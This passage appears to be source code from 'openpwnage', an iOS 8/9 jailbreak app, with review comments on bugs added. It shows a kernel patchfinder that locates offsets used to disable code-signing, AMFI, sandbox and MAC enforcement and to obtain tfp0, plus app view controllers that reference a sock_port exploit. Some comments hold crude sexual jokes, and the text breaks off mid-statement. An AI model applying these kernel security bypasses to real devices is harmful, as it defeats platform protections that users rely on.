lwvm2: 0x%08x\n", lwvm2); 
286 | return lwvm2; 287 | } 288 | } else if (version_float == (float)9.0) { 289 | if ((*(uint64_t*)&kdata[i] & 0x00ffffffffffffff) == 0xd4d0060f01f010) { 290 | uint32_t lwvm2 = i + 0x4; 291 | printf("[*] found lwvm2: 0x%08x\n", lwvm2); 292 | return lwvm2; 293 | } 294 | } else { 295 | if (*(uint32_t*)&kdata[i] == 0x0f01f010 && *(uint8_t*)&kdata[i+0x5] == 0xd0 && *(uint32_t*)&kdata[i+0xe] == 0x0f40f010 && *(uint8_t*)&kdata[i+0x13] == 0xd0) { 296 | uint32_t lwvm2 = i + 0x4; 297 | printf("[*] found lwvm2: 0x%08x\n", lwvm2); 298 | return lwvm2; 299 | } 300 | } 301 | } 302 | return -1; 303 | } 304 | 305 | uint32_t find_lwvm_call(uint32_t region, uint8_t* kdata, size_t ksize) { 306 | char* faceable = memmem(kdata, ksize, "\xce\xab\x1e\xef\xfa\xce\xab\x1e", 8); 307 | if (!faceable) 308 | return -1; 309 | char* lwvm_call_pointer = faceable + 0x78; 310 | uint32_t lwvm_call = (uintptr_t)lwvm_call_pointer - (uintptr_t)kdata; 311 | olog("[*] found lwvm_call: 0x%08x\n", lwvm_call); 312 | return lwvm_call; 313 | } 314 | 315 | uint32_t find_lwvm_call_offset(uint32_t region, uint8_t* kdata, size_t ksize) { 316 | for (uint32_t i = 0; i < ksize; i += 2) { 317 | if (*(uint64_t*)&kdata[i] == 0xf010798044406da0 && *(uint32_t*)&kdata[i+0x8] == 0xd0060f01 && *(uint16_t*)&kdata[i+0xC] == 0x4620) { 318 | uint32_t lwvm_call_offset = i + 1; 319 | olog("[*] found lwvm_call_offset: 0x%08x\n", lwvm_call_offset); 320 | return lwvm_call_offset; 321 | } 322 | } 323 | return -1; 324 | } 325 | 326 | uint32_t find_substrate1(uint32_t region, uint8_t* kdata, size_t ksize) { 327 | for (uint32_t i = 0; i < ksize; i++) { 328 | if (*(uint64_t*)&kdata[i] == 0x0000f8dabf1e2800 && *(uint32_t*)&kdata[i+0x8] == 0x0004f040) { 329 | uint32_t substrate1 = i + 0x2 - 0x49000; 330 | printf("[*] found substrate1: 0x%08x\n", substrate1); 331 | return substrate1; 332 | } 333 | } 334 | return -1; 335 | } 336 | 337 | uint32_t find_substrate2(uint32_t region, uint8_t* kdata, size_t ksize) { 338 | for (uint32_t i = 0; i < 
ksize; i++) { 339 | if (*(uint64_t*)&kdata[i] == 0x0000f8dabf1e2800 && *(uint32_t*)&kdata[i+0x8] == 0x0004f040) { 340 | uint32_t substrate2 = i + 0x16 - 0x49000; 341 | printf("[*] found substrate2: 0x%08x\n", substrate2); 342 | return substrate2; 343 | } 344 | } 345 | return -1; 346 | } 347 | 348 | uint32_t* find_substrate1_and_2(uint32_t region, uint8_t* kdata, size_t ksize, char* version) { 349 | uint32_t* one_and_two = malloc(2 * sizeof(uint32_t)); 350 | for (uint32_t i = 0; i < ksize; i++) { 351 | if (*(uint64_t*)&kdata[i] == 0x0000f8dabf1e2800 && *(uint32_t*)&kdata[i+0x8] == 0x0004f040) { 352 | uint32_t substrate1 = i + 0x2 - 0x49000; 353 | uint32_t substrate2 = i + 0x16 - 0x49000; 354 | one_and_two[0] = substrate1; 355 | one_and_two[1] = substrate2; 356 | printf("[*] found substrate1: 0x%08x\n", substrate1); 357 | printf("[*] found substrate2: 0x%08x\n", substrate2); 358 | return one_and_two; 359 | } 360 | } 361 | return NULL; 362 | } 363 | 364 | uint32_t find_proc_enforce(uint32_t region, uint8_t* kdata, size_t ksize) { 365 | // adapted from daibutsu pf 366 | char* proc_enforce_description = memmem(kdata, ksize, "Enforce MAC policy on process operations", strlen("Enforce MAC policy on process operations")); 367 | if (!proc_enforce_description) 368 | return -1; 369 | 370 | uint32_t proc_enforce_description_address = region + ((uintptr_t)proc_enforce_description - (uintptr_t)kdata); 371 | char* proc_enforce_description_ptr = memmem(kdata, ksize, (char*)&proc_enforce_description_address, sizeof(proc_enforce_description_address)); 372 | if (!proc_enforce_description_ptr) 373 | return -1; 374 | 375 | uint32_t* proc_enforce_ptr = (uint32_t*)(proc_enforce_description_ptr - (5 * sizeof(uint32_t))); 376 | uint32_t proc_enforce = *proc_enforce_ptr - region; 377 | 378 | olog("[*] proc_enforce: 0x%08x\n", proc_enforce); 379 | 380 | return proc_enforce; 381 | } 382 | 383 | uint32_t find_vm_fault_enter_patch(uint32_t region, uint8_t* kdata, size_t ksize) { 384 | const 
struct find_search_mask search_masks[] = { 385 | {0xF800, 0x6800}, // LDR R2, [Ry,#X] 386 | {0xF8FF, 0x2800}, // CMP Rx, #0 387 | {0xFF00, 0xD100}, // BNE x 388 | {0xFBF0, 0xF010}, // TST.W Rx, #0x200000 389 | {0x0F00, 0x0F00}, 390 | {0xFF00, 0xD100}, // BNE x 391 | {0xFFF0, 0xF400}, // AND.W Rx, Ry, #0x100000 392 | {0xF0FF, 0x1080} 393 | }; 394 | 395 | uint16_t* insn = find_with_search_mask(region, kdata, ksize, sizeof(search_masks) / sizeof(*search_masks), search_masks); 396 | if (!insn) 397 | return 0; 398 | 399 | uint32_t vm_fault_enter_patch = ((uintptr_t)insn) - ((uintptr_t)kdata); 400 | olog("[*] found vm_fault_enter_patch: 0x%08x\n", vm_fault_enter_patch); 401 | 402 | return vm_fault_enter_patch; 403 | } 404 | 405 | uint32_t find_vm_map_enter_patch(uint32_t region, uint8_t* kdata, size_t ksize) { 406 | const struct find_search_mask search_masks_90[] = { 407 | {0xFFF0, 0xF010}, // TST.W Rz, #4 408 | {0xFFFF, 0x0F04}, 409 | {0xFF78, 0x4600}, // MOV Rx, R0 (?) 410 | {0xFFF0, 0xBF10}, // IT NE (?) 
411 | {0xFFF0, 0xF020}, // BICNE.W Rk, Rk, #4 412 | {0xF0FF, 0x0004} 413 | }; 414 | 415 | const struct find_search_mask search_masks_84[] = { 416 | {0xFFF0, 0xF000}, // AND.W Rx, Ry, #2 417 | {0xF0FF, 0x0002}, 418 | {0xFFF0, 0xF010}, // TST.W Rz, #2 419 | {0xFFFF, 0x0F02}, 420 | {0xFF00, 0xD000}, // BEQ loc_xxx 421 | {0xF8FF, 0x2000}, // MOVS Rk, #0 422 | {0xFFF0, 0xF010}, // TST.W Rz, #4 423 | {0xFFFF, 0x0F04} 424 | }; 425 | 426 | const struct find_search_mask search_masks[] = { 427 | {0xFBE0, 0xF000}, 428 | {0x8000, 0x0000}, 429 | {0xFFF0, 0xF010}, 430 | {0xFFFF, 0x0F02}, 431 | {0xFF00, 0xD000}, 432 | {0xF8FF, 0x2000}, 433 | {0xFFF0, 0xF010}, 434 | {0xFFFF, 0x0F04} 435 | }; 436 | 437 | uint16_t* insn = find_with_search_mask(region, kdata, ksize, sizeof(search_masks_90) / sizeof(*search_masks_90), search_masks_90); 438 | if (!insn) 439 | insn = find_with_search_mask(region, kdata, ksize, sizeof(search_masks) / sizeof(*search_masks), search_masks); 440 | if (!insn) { 441 | insn = find_with_search_mask(region, kdata, ksize, sizeof(search_masks_84) / sizeof(*search_masks_84), search_masks_84); 442 | if (!insn) 443 | return 0; 444 | insn += 2; 445 | uint32_t vm_map_enter_patch = ((uintptr_t)insn) - ((uintptr_t)kdata); 446 | olog("[*] found vm_map_enter_patch: 0x%08x\n", vm_map_enter_patch); 447 | 448 | return vm_map_enter_patch; 449 | } 450 | 451 | insn += 4; 452 | uint32_t vm_map_enter_patch = ((uintptr_t)insn) - ((uintptr_t)kdata); 453 | olog("[*] found vm_map_enter_patch: 0x%08x\n", vm_map_enter_patch); 454 | 455 | return vm_map_enter_patch; 456 | } 457 | 458 | uint32_t find_csops(uint32_t region, uint8_t* kdata, size_t ksize) { 459 | const struct find_search_mask search_masks_90[] = 460 | { 461 | {0xFFF0, 0xF100}, 462 | {0x0000, 0x0000}, 463 | {0xFF80, 0x4600}, 464 | {0xFC00, 0xF400}, 465 | {0x0000, 0x0000}, 466 | {0xFFF0, 0xF890}, 467 | {0x0000, 0x0000}, 468 | {0xFFF0, 0xF010}, 469 | {0xFFFF, 0x0F01}, 470 | {0xF800, 0xD000}, 471 | }; 472 | 473 | const struct 
find_search_mask search_masks[] = 474 | { 475 | {0xFC00, 0xF400}, 476 | {0x0000, 0x0000}, 477 | {0xF800, 0xE000}, 478 | {0x0000, 0x0000}, 479 | {0xFFF0, 0xF100}, 480 | {0x0000, 0x0000}, 481 | {0xFF80, 0x4600}, 482 | {0xF800, 0xF000}, 483 | {0x0000, 0x0000}, 484 | {0xFF80, 0x4600}, 485 | {0xFFF0, 0xF890}, 486 | {0x0000, 0x0000}, 487 | {0xFFF0, 0xF010}, 488 | {0xFFFF, 0x0F01}, 489 | {0xFC00, 0xF000}, 490 | {0x0000, 0x0000} 491 | }; 492 | 493 | uint16_t* insn = find_with_search_mask(region, kdata, ksize, sizeof(search_masks_90) / sizeof(*search_masks_90), search_masks_90); 494 | if (!insn) { 495 | insn = find_with_search_mask(region, kdata, ksize, sizeof(search_masks) / sizeof(*search_masks), search_masks); 496 | if (!insn) 497 | return 0; 498 | insn += 14; 499 | } 500 | else 501 | insn += 9; 502 | 503 | uint32_t csops = ((uintptr_t)insn) - ((uintptr_t)kdata); 504 | olog("[*] found csops: 0x%08x\n", csops); 505 | 506 | return csops; 507 | } 508 | 509 | uint32_t find_mapForIO(uint32_t region, uint8_t* kdata, size_t ksize) { 510 | for (uint32_t i = 0; i < ksize; i++) { 511 | if (*(uint64_t*)&kdata[i] == 0xf010798044406da0 && *(uint32_t*)&kdata[i+0x8] == 0xd0060f01 && *(uint16_t*)&kdata[i+0xC] == 0x4620) { 512 | uint32_t mapForIO = i - 4; 513 | olog("[*] found mapForIO: 0x%08x\n", mapForIO); 514 | return mapForIO; 515 | } 516 | } 517 | return -1; 518 | } 519 | 520 | uint32_t find_sandbox_call_i_can_has_debugger(uint32_t region, uint8_t* kdata, size_t ksize) { 521 | const struct find_search_mask search_masks_90[] = 522 | { 523 | {0xFFFF, 0xB590}, // PUSH {R4,R7,LR} 524 | {0xFFFF, 0xAF01}, // ADD R7, SP, #4 525 | {0xFFFF, 0x2000}, // MOVS R0, #0 526 | {0xFFFF, 0x2400}, // MOVS R4, #0 527 | {0xF800, 0xF000}, // BL i_can_has_debugger 528 | {0xD000, 0xD000}, 529 | {0xFD07, 0xB100} // CBZ R0, loc_xxx 530 | }; 531 | 532 | const struct find_search_mask search_masks[] = 533 | { 534 | {0xFFFF, 0xB590}, // PUSH {R4,R7,LR} 535 | {0xFFFF, 0x2000}, // MOVS R0, #0 536 | {0xFFFF, 
0xAF01}, // ADD R7, SP, #4 537 | {0xFFFF, 0x2400}, // MOVS R4, #0 538 | {0xF800, 0xF000}, // BL i_can_has_debugger 539 | {0xD000, 0xD000}, 540 | {0xFD07, 0xB100} // CBZ R0, loc_xxx 541 | }; 542 | 543 | uint16_t* ptr = find_with_search_mask(region, kdata, ksize, sizeof(search_masks_90) / sizeof(*search_masks_90), search_masks_90); 544 | if (!ptr) { 545 | printf("[*] not 90...\n"); 546 | ptr = find_with_search_mask(region, kdata, ksize, sizeof(search_masks) / sizeof(*search_masks), search_masks); 547 | } 548 | if (!ptr) 549 | return 0; 550 | 551 | uint32_t sandbox_call_i_can_has_debugger = (uintptr_t)ptr + 8 - ((uintptr_t)kdata); 552 | olog("[*] found sandbox_call_i_can_has_debugger: 0x%08x\n", sandbox_call_i_can_has_debugger); 553 | 554 | return sandbox_call_i_can_has_debugger; 555 | } 556 | 557 | // literally just the og patchfinder function but with char* version, which is unused, but is there because of old patches lol 558 | // actually minor changes were made 559 | // the return otherwise nah 560 | uint32_t find_amfi_file_check_mmap(uint32_t region, uint8_t* kdata, size_t ksize) { 561 | #if 0 562 | uint8_t* hook_execve = memmem(kdata, ksize, "AMFI: hook..execve() killing pid %u: %s\n", sizeof("AMFI: hook..execve() killing pid %u: %s\n")); 563 | //printf("%x\n", hook_execve - kdata); 564 | if (!hook_execve) 565 | return 0; 566 | 567 | // Find a reference to the "AMFI: hook..execve() killing pid ..." string. 
568 | uint16_t* ref = find_literal_ref(region, kdata, ksize, (uint16_t*) kdata, (uintptr_t)hook_execve - (uintptr_t)kdata); 569 | //printf("%x\n", (uint8_t*)ref - kdata); 570 | if (!ref) 571 | return 0; 572 | 573 | uint32_t amfi_off = (uintptr_t)ref - (uintptr_t)kdata; 574 | #endif 575 | 576 | uint8_t* rootless = memmem(kdata, ksize, "com.apple.rootless.install", sizeof("com.apple.rootless.install")); 577 | //printf("%x\n", (uint8_t*)rootless - kdata); 578 | if (!rootless) 579 | return 0; 580 | 581 | // Find a reference to the "com.apple.rootless.install" string. 582 | uint16_t* ref = find_literal_ref(region, kdata, ksize, (uint16_t*) kdata, (uintptr_t)rootless - (uintptr_t)kdata); 583 | //printf("%x\n", (uint8_t*)ref - kdata); 584 | if (!ref) 585 | return 0; 586 | 587 | #if 0 588 | uint32_t rootless_off = (uintptr_t)ref - (uintptr_t)kdata; 589 | if (amfi_off > rootless_off || 590 | (amfi_off + 0x800) < rootless_off) 591 | { 592 | rootless = memmem(kdata+rootless_off, ksize-rootless_off, "com.apple.rootless.install", sizeof("com.apple.rootless.install")); 593 | if (!rootless) 594 | return 0; 595 | 596 | // Re-Find a reference to the "com.apple.rootless.install" string. 
597 | ref = find_literal_ref(region, kdata, ksize, (uint16_t*) kdata, (uintptr_t)rootless - (uintptr_t)kdata); 598 | //printf("%x\n", (uint8_t*)ref - kdata); 599 | if (!ref) 600 | return 0; 601 | rootless_off = (uintptr_t)ref - (uintptr_t)kdata; 602 | } 603 | #endif 604 | 605 | int i=0; 606 | while (1){ 607 | if (i>16) 608 | return 0; 609 | if ((ref[i] & 0xfff0) == 0xbf10) // it ne 610 | break; 611 | i++; 612 | } 613 | 614 | ref += (i-1); 615 | 616 | uint32_t amfi_file_check_mmap = (uintptr_t)ref - (uintptr_t)kdata; 617 | olog("[*] found amfi_file_check_mmap: 0x%08x\n", amfi_file_check_mmap); 618 | 619 | return amfi_file_check_mmap; 620 | } 621 | 622 | uint32_t find_allproc(uint32_t region, uint8_t* kdata, size_t ksize, char* version) { 623 | // XXX: TODO 624 | uint32_t allproc = 0x45717c; 625 | olog("[*] found allproc: 0x%08x\n", allproc); 626 | return allproc; 627 | } 628 | 629 | uint32_t find_tfp0(uint32_t region, uint8_t* kdata, size_t ksize, char* version) { 630 | for (uint32_t i = 0; i < ksize; i++) { 631 | if (*(uint16_t*)&kdata[i] == 0x4630 && *(uint64_t*)&kdata[i + 6] == 0xf0000f00f1ba4682 && *(uint32_t*)&kdata[i + 0x10] == 0xf0014650) { 632 | // jesus christ john, this is ugly as FUCK 633 | for (int a = i; a > (i - 0x30); a -= 2) { 634 | if (*(uint16_t*)&kdata[a] == 0xb5f0) { 635 | for (int e = a; e < (a + 0x20); e += 2) { 636 | if (*(uint16_t*)&kdata[e] == 0x2e00) { 637 | uint32_t tfp0 = e + 0x4; 638 | olog("[*] found tfp0: 0x%08x\n", tfp0); 639 | return tfp0; 640 | } 641 | } 642 | } 643 | } 644 | } 645 | } 646 | return -1; 647 | } 648 | 649 | uint32_t find_sbops(uint32_t region, uint8_t* kdata, size_t ksize) { 650 | char* seatbelt_sandbox_policy = memmem(kdata, 651 | ksize, 652 | "Seatbelt sandbox policy", 653 | strlen("Seatbelt sandbox policy")); 654 | olog("[*] seatbelt_sandbox_policy 0x%08lx\n", 655 | (uintptr_t)seatbelt_sandbox_policy); 656 | if (!seatbelt_sandbox_policy) 657 | return -1; 658 | 659 | uint32_t seatbelt = 
(uintptr_t)seatbelt_sandbox_policy
660 | - (uintptr_t)kdata
661 | + region;
662 | olog("[*] seatbelt: 0x%08x\n", seatbelt);
663 | 
664 | char* seatbelt_sandbox_policy_ptr = memmem(kdata,
665 | ksize,
666 | (char*)&seatbelt,
667 | sizeof(seatbelt));
668 | 
669 | olog("[*] seatbelt_sandbox_policy_ptr 0x%08lx\n",
670 | (uintptr_t)seatbelt_sandbox_policy_ptr);
671 | if (!seatbelt_sandbox_policy_ptr)
672 | return -1;
673 | 
674 | uint32_t ptr_to_seatbelt = (uintptr_t)seatbelt_sandbox_policy_ptr
675 | - (uintptr_t)kdata;
676 | uint32_t sbops = ptr_to_seatbelt + 0x24;
677 | olog("[*] found sbops: 0x%08x\n", sbops);
678 | 
679 | return sbops;
680 | }
681 | 
// Byte-scans kdata for the mount_common match and returns its offset into kdata,
// or (uint32_t)-1 when nothing matches. Which byte pattern is probed depends on the
// running iOS version (9.3.x, 9.0.x, or anything else).
682 | uint32_t find_mount_common(uint32_t region, uint8_t* kdata, size_t ksize) {
683 | char *version = (char*)[[[UIDevice currentDevice] systemVersion]
684 | UTF8String];
// NOTE(review): strtof() stops at the second '.', so e.g. "9.3.5" compares equal to
// 9.3, while 9.1/9.2 fall through to the generic branch — confirm that is intended.
685 | float version_float = strtof(version, 0);
// NOTE(review): every branch below reads beyond kdata[i] (up to kdata[i+0x13]), but i
// runs all the way to ksize-1, so the last bytes of the buffer are read out of bounds;
// bounding i by ksize - 0x14 would fix it. The other byte-scanning finders in this
// file share the same shape. The casts also perform unaligned 64-bit loads, which C
// does not guarantee; memcpy into a local is the portable form. The version test is
// loop-invariant and could be hoisted out of the loop.
686 | for (uint32_t i = 0; i < ksize; i++) {
687 | if (version_float == (float)9.3) {
688 | if (*(uint64_t*)&kdata[i] == 0x2501d1030f01f01b && *(uint32_t*)&kdata[i+0x8] == 0x2501e016) {
689 | uint32_t mount_common = i + 0x5;
690 | printf("[*] found mount_common: 0x%08x\n", mount_common);
691 | return mount_common;
692 | }
693 | } else if (version_float == (float)9.0) {
694 | if ((*(uint64_t*)&kdata[i] & 0x00ffffffffffffff) == 0xd4d0060f01f010) {
695 | uint32_t mount_common = i + 0x5;
696 | printf("[*] found mount_common: 0x%08x\n", mount_common);
697 | return mount_common;
698 | }
699 | } else {
700 | if (*(uint32_t*)&kdata[i] == 0x0f01f010 && *(uint8_t*)&kdata[i+0x5] == 0xd0 && *(uint32_t*)&kdata[i+0xe] == 0x0f40f010 && *(uint8_t*)&kdata[i+0x13] == 0xd0) {
701 | uint32_t mount_common = i + 0x5;
702 | printf("[*] found mount_common: 0x%08x\n", mount_common);
703 | return mount_common;
704 | }
705 | }
706 | }
707 | return -1;
708 | }
709 | 
// Locates the AMFI bundle-identifier string in kdata and returns its offset plus a
// fixed 0xb1.
710 | uint32_t find_cs_enforcement_disable_amfi(uint32_t region, uint8_t* kdata, size_t ksize) {
711 | char* amfi = memmem(kdata, ksize, "com.apple.driver.AppleMobileFileIntegrity", strlen("com.apple.driver.AppleMobileFileIntegrity"));
// NOTE(review): amfi is not NULL-checked; when memmem finds no match the subtraction
// below is undefined and a bogus offset is returned instead of -1 like the other
// finders in this file (find_lwvm_call, find_proc_enforce, find_sbops).
712 | uint32_t cs_enforcement_disable_amfi = (uintptr_t)amfi - (uintptr_t)kdata + 0xb1;
713 | printf("[*] cs_enforcement_disable_amfi: 0x%08x\n", cs_enforcement_disable_amfi);
714 | return cs_enforcement_disable_amfi;
715 | }
716 | 
--------------------------------------------------------------------------------
/openpwnage/SettingsViewController.h:
--------------------------------------------------------------------------------
1 | //
2 | // SettingsViewController.h
3 | // openpwnage
4 | //
5 | // Created by Zachary Keffaber on 5/26/22.
6 | //
7 | 
// NOTE(review): the header name after #import was lost in extraction (presumably
// <UIKit/UIKit.h>, since UIViewController is used below); check the original file.
8 | #import
9 | 
10 | @interface SettingsViewController : UIViewController
11 | 
12 | 
13 | @end
14 | 
--------------------------------------------------------------------------------
/openpwnage/SettingsViewController.m:
--------------------------------------------------------------------------------
1 | //
2 | // SettingsViewController.m
3 | // openpwnage
4 | //
5 | // Created by Zachary Keffaber on 5/26/22.
6 | //
7 | 
8 | #import "SettingsViewController.h"
9 | 
10 | @interface SettingsViewController ()
11 | 
12 | @end
13 | 
14 | @implementation SettingsViewController
15 | 
16 | - (void)viewDidLoad {
17 | [super viewDidLoad];
18 | // Do any additional setup after loading the view.
19 | }
20 | 
// TODO(review): empty handler — flipping this switch currently has no effect.
21 | - (IBAction)remountFSSwitch:(id)sender {
22 | 
23 | }
// NOTE(review): filename is built but never written to or removed, so this switch
// currently has no effect either, and nothing at all happens when it is turned off.
24 | - (IBAction)TweakInjectionSwitch:(id)sender {
25 | if ([sender isOn]) {
26 | NSArray *paths = NSSearchPathForDirectoriesInDomains(NSDocumentDirectory, NSUserDomainMask, YES);
27 | NSString *documentsDirectory = [paths objectAtIndex:0];
28 | NSString *filename = [documentsDirectory stringByAppendingPathComponent:@"disabletweakinjection.txt"];
29 | }
30 | }
31 | 
32 | @end
33 | 
--------------------------------------------------------------------------------
/openpwnage/ViewController.h:
--------------------------------------------------------------------------------
1 | //
2 | // ViewController.h
3 | // openpwnage
4 | //
5 | // Created by Zachary Keffaber on 4/20/22.
6 | //
7 | 
// NOTE(review): the header names after #import/#include were lost in extraction;
// check the original file.
8 | #import
9 | #include
10 | #include
11 | 
12 | @interface ViewController : UIViewController
13 | @property (nonatomic, retain) IBOutlet UITextView *consoleView;
// NOTE(review): these four are plain C prototypes, not methods; declaring them inside
// @interface compiles but is unusual — they would normally sit outside the
// @interface ... @end block.
14 | void openpwnageCLog(NSString* textToLog);
15 | uintptr_t kbase(void);
16 | task_t get_kernel_task(void);
17 | void exploit_cleanup(task_t);
18 | @end
19 | 
--------------------------------------------------------------------------------
/openpwnage/ViewController.m:
--------------------------------------------------------------------------------
1 | //
2 | // ViewController.m
3 | // openpwnage
4 | //
5 | // Created by Zachary Keffaber on 4/20/22.
6 | // 7 | 8 | #import "ViewController.h" 9 | #import 10 | #include 11 | #include 12 | 13 | #import "jailbreak.h" 14 | #import "sock_port/exploit.h" 15 | #include 16 | #include "sock_port/pf10.h" 17 | 18 | #define UNSLID_BASE 0x80001000 19 | 20 | #define UIColorFromRGB(rgbValue) [UIColor \ 21 | colorWithRed:((float)((rgbValue & 0xFF0000) >> 16))/255.0 \ 22 | green:((float)((rgbValue & 0xFF00) >> 8))/255.0 \ 23 | blue:((float)(rgbValue & 0xFF))/255.0 alpha:1.0] 24 | 25 | @interface ViewController () 26 | @property (weak, nonatomic) IBOutlet UILabel *openpwnLabel; 27 | @property (weak, nonatomic) IBOutlet UILabel *notSupportedLabel; 28 | @property (weak, nonatomic) IBOutlet UIButton *jbButton; 29 | //@property (weak, nonatomic) IBOutlet UITextView *consoleView; 30 | @property (weak, nonatomic) IBOutlet UIButton *settingsButton; 31 | -(void)openpwnageConsoleLog:(NSString*)textToLog; 32 | @end 33 | 34 | @implementation ViewController 35 | 36 | @synthesize consoleView; 37 | 38 | id param_; 39 | 40 | static id static_consoleView = nil; 41 | -(void)viewDidLoad { 42 | [super viewDidLoad]; 43 | param_ = self; 44 | [self setNeedsStatusBarAppearanceUpdate]; 45 | // Do any additional setup after loading the view. 
46 | _jbButton.layer.cornerRadius = 5.0; 47 | consoleView.layer.cornerRadius = 10.0; 48 | struct utsname systemInfo; 49 | uname(&systemInfo); 50 | NSDateFormatter *dateFormatter=[[NSDateFormatter alloc] init]; 51 | [dateFormatter setDateFormat:@"MM-dd"]; 52 | if ([[dateFormatter stringFromDate:[NSDate date]]isEqualToString:@"04-01"]){ 53 | srand(time(0)); 54 | int randjokenameid = (rand() % 17) + 1; 55 | if (randjokenameid == 1) { 56 | _openpwnLabel.text = @"mompwnage"; //zachary7829#9778 (me) (what i do to capt's mom each night) 57 | } else if (randjokenameid == 2) { 58 | _openpwnLabel.text = @"bozopwnage"; //hydrate#9351 59 | } else if (randjokenameid == 3) { 60 | _openpwnLabel.text = @"Manticore"; //Orangera1n#9957 holy shit it's reel 61 | } else if (randjokenameid == 4) { 62 | _openpwnLabel.text = @"nJailbreak"; //flower#1116 63 | } else if (randjokenameid == 5) { 64 | _openpwnLabel.text = @"Serenajb"; //Billie#0303 65 | } else if (randjokenameid == 6) { 66 | _openpwnLabel.text = @"flowerbreak"; //flower#1116 67 | } else if (randjokenameid == 7) { 68 | _openpwnLabel.text = @"Stendra"; //Dan(infinity synbol that i can't type)#9999 coolstar trol 69 | } else if (randjokenameid == 8) { 70 | _openpwnLabel.text = @"ligmabreak"; //Neptune#6866 71 | } else if (randjokenameid == 9) { 72 | _openpwnLabel.text = @"MokitoCoreJB"; //Billie#0303 73 | } else if (randjokenameid == 10) { 74 | _openpwnLabel.text = @"Zer0Tw0Pwn"; //Neptune#6866 75 | } else if (randjokenameid == 11) { 76 | _openpwnLabel.text = @"pastcutsJB"; //flower#1116 (no way!!,,) 77 | } else if (randjokenameid == 12) { 78 | _openpwnLabel.text = @"BallsInYoJaws"; //Neptune#6866 erhoihgioer stop 79 | } else if (randjokenameid == 13) { 80 | _openpwnLabel.text = @"c0met14"; //Neptune#6866 holy shit iOS 14 jailbreak for iOS 8/9 I can't believe this 81 | } else if (randjokenameid == 14) { 82 | _openpwnLabel.text = @"CookieMonster"; //WhitetailAni#1287 holy shit iOS 14 jailbreak for iOS 8/9 I can't believe this 83 | 
} else if (randjokenameid == 15) { 84 | _openpwnLabel.text = @"im gay"; //not me i swear guys im not gay ,, but ,,,, 85 | } else if (randjokenameid == 16) { 86 | _openpwnLabel.text = @"FurryJB"; //furr rrr aw so cute rrr 87 | } else if (randjokenameid == 17) { 88 | _openpwnLabel.text = @"Estrogen"; // AWSOM!! 89 | } 90 | } else if ([[dateFormatter stringFromDate:[NSDate date]]isEqualToString:@"05-19"]){ 91 | //when the first build of openpwnage was released. you get a ton of names i considered for a jailbreak, and i didn't want to waste them so I'm throwing them here 92 | srand(time(0)); 93 | int randjokenameid = (rand() % 17) + 1; 94 | if (randjokenameid == 1) { 95 | _openpwnLabel.text = @"Bonobo"; //coming to a iPhone 2G 1.0-1.0.2 near you! 96 | } else if (randjokenameid == 2) { 97 | _openpwnLabel.text = @"Malaria"; //coming to a iPhone 4 near you! 98 | } else if (randjokenameid == 3) { 99 | _openpwnLabel.text = @"WinterSn0w"; //coming to a iPod Touch 1 iOS 1 near you! 100 | } else if (randjokenameid == 4) { 101 | _openpwnLabel.text = @"FurryJB"; //suck my cock 102 | } else if (randjokenameid == 5) { 103 | _openpwnLabel.text = @"BigshotJB"; //pretty cool jailbreak name tbh 104 | } else if (randjokenameid == 6) { 105 | _openpwnLabel.text = @"Vader"; //y'know, from like... star wars? 
106 | } else if (randjokenameid == 7) { 107 | _openpwnLabel.text = @"EasyPwnage"; //the actual name sounds like so much better imo 108 | } else if (randjokenameid == 8) { 109 | _openpwnLabel.text = @"p0wdersn0w"; //huh this actually sounds like it could be the name of some old tethered/untethered jailbreak lol 110 | } else if (randjokenameid == 9) { 111 | _openpwnLabel.text = @"richman"; //i don't have anything to comment on this one sorry 112 | } else if (randjokenameid == 10) { 113 | _openpwnLabel.text = @"evil_jellyfish"; //used to really like this name, now, tbh sounds stupid 114 | } else if (randjokenameid == 11) { 115 | _openpwnLabel.text = @"Pepper"; //if i ever make a iOS 11 untether i'll call it Pepper. but I won't because who tf uses iOS 11 and it's not like i have any devices for it anyway 116 | } else if (randjokenameid == 12) { 117 | _openpwnLabel.text = @"milkman"; // MAN 118 | } else if (randjokenameid == 13) { 119 | _openpwnLabel.text = @"meguh4x"; // MEGUMIN MEGUMIN MEGYMIN MEGUMIN MEGUMININNNNNNNN (worship) 120 | } else if (randjokenameid == 14) { 121 | _openpwnLabel.text = @"Cherry"; // i don't even like cherries tbh not sure why i loved this name for so long 122 | } else if (randjokenameid == 15) { 123 | _openpwnLabel.text = @"newsc00by"; // scooby dooby doo where are you. maybe i got this name from listening to the WHAT'S NEW SCOOBY DOO theme some a million times as a kid. 
i don't remember anything from that show but that theme song slapped hard and still slaps hard now 124 | } else if (randjokenameid == 16) { 125 | _openpwnLabel.text = @"sn0wra1n"; // like WinterSn0w but less cool 126 | } else if (randjokenameid == 17) { 127 | _openpwnLabel.text = @"PonyJB"; // i am a brony 128 | } 129 | } 130 | _settingsButton.hidden = 1; 131 | 132 | consoleView.text = [NSString stringWithFormat:@"[*]openpwnage running on %@ with iOS %@\n", [NSString stringWithCString:systemInfo.machine encoding:NSUTF8StringEncoding], [[UIDevice currentDevice] systemVersion]]; 133 | [_jbButton setImage:[UIImage imageNamed:@"openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.png"] forState:UIControlStateHighlighted]; 134 | [_jbButton setImage:[UIImage imageNamed:@"openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.png"] forState:UIControlStateSelected]; 135 | [_jbButton setImage:[UIImage imageNamed:@"openpwnageB7JailbreakingButtonopenpwnageB7JailbreakingButton.png"] forState:UIControlStateDisabled]; 136 | 137 | size_t size; 138 | sysctlbyname("kern.version", NULL, &size, NULL, 0); 139 | char *kernelVersion = malloc(size); 140 | sysctlbyname("kern.version", kernelVersion, &size, NULL, 0); 141 | olog("%s\n",kernelVersion); 142 | 143 | char *newkernv = malloc(size - 44); 144 | char *semicolon = strchr(kernelVersion, '~'); 145 | int indexofsemi = (int)(semicolon - kernelVersion); 146 | int indexofrootxnu = indexofsemi; 147 | while (kernelVersion[indexofrootxnu - 1] != '-') { 148 | indexofrootxnu -= 1; 149 | } 150 | memcpy(newkernv, &kernelVersion[indexofrootxnu], indexofsemi - indexofrootxnu + 2); 151 | newkernv[indexofsemi - indexofrootxnu + 2] = '\0'; 152 | 153 | olog("Kernel Version: %s\n",newkernv); 154 | 155 | olog("openpwnage stage: Beta\n"); 156 | olog("openpwnage build 10\n"); 157 | 158 | //olog("olog functional!"); 159 | 160 | //remember to detect free space to check that the bootstrap can be installed 161 | 162 | NSArray *supportedDevices = 
